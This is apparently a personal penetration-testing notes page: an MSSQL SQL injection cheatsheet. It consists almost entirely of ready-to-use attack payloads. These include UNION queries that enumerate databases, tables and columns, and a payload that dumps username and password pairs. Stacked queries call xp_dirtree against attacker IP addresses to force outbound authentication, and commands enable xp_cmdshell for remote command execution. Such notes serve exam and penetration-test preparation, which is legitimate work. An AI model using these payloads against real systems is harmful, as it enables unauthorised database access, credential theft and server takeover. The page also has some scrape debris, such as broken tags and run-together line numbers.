// notes/ Web Exploitation
🕸️
SQL Injection MSSQL Cheatsheet
<strongunion select name,id from <db..sysobjects where xtype='u'-- -
#web applications#adot8
source · oscp.adot8.com · web-applications/sql-injection_mssql-cheatsheet ↗MSSQL Cheatsheet
Database names and ID's
<pre><code>user db_name(5) <strong>union select name,id from <db>..sysobjects where xtype='u'-- - </strong>union select concat(name,':',id) from <db>..sysobjects where xtype='u'-- - union select 1,(select string_agg(concat(name,':',id), '|') from <db>..sysobjects where xtype='u')-- - </code></pre>code
01Select @@version;02Select name from sys.databases;03select * from master.information_schema.tables;04select * from master..users;{% hint style="info" %} database's 1-4 are default mssql databases ; also note down the database ID for table queries {% endhint %}
Enumerate columns
code
01union select (select string_agg(name, '|') from <db>..syscolumns where id='<dbID>')Dump columns
code
01union select 1,(select string_agg(concat(username,':',password), '|') from <table>)-- -{% hint style="info" %} %s/[ ]//g
%s/|/\r/g
cat cracked | awk -F: '{print $1":"$3}'
cat cracked | awk -F: '{print $1}' {% endhint %}
Query stacking with ;
code
01q=fast'; exec xp_dirtree '\\10.10.14.6\adot8';-- -RCE
code
01sp_configure 'show advanced options', '1'02RECONFIGURE03sp_configure 'xp_cmdshell', '1'04RECONFIGUREcode
01'EXEC sp_configure 'show advanced options',1-- -02'RECONFIGURE-- - 03'EXEC sp_configure 'xp_cmdshell',1-- -04'RECONFIGURE-- -code
01'EXEC xp_dirtree "\\192.168.45.237\adot8"-- -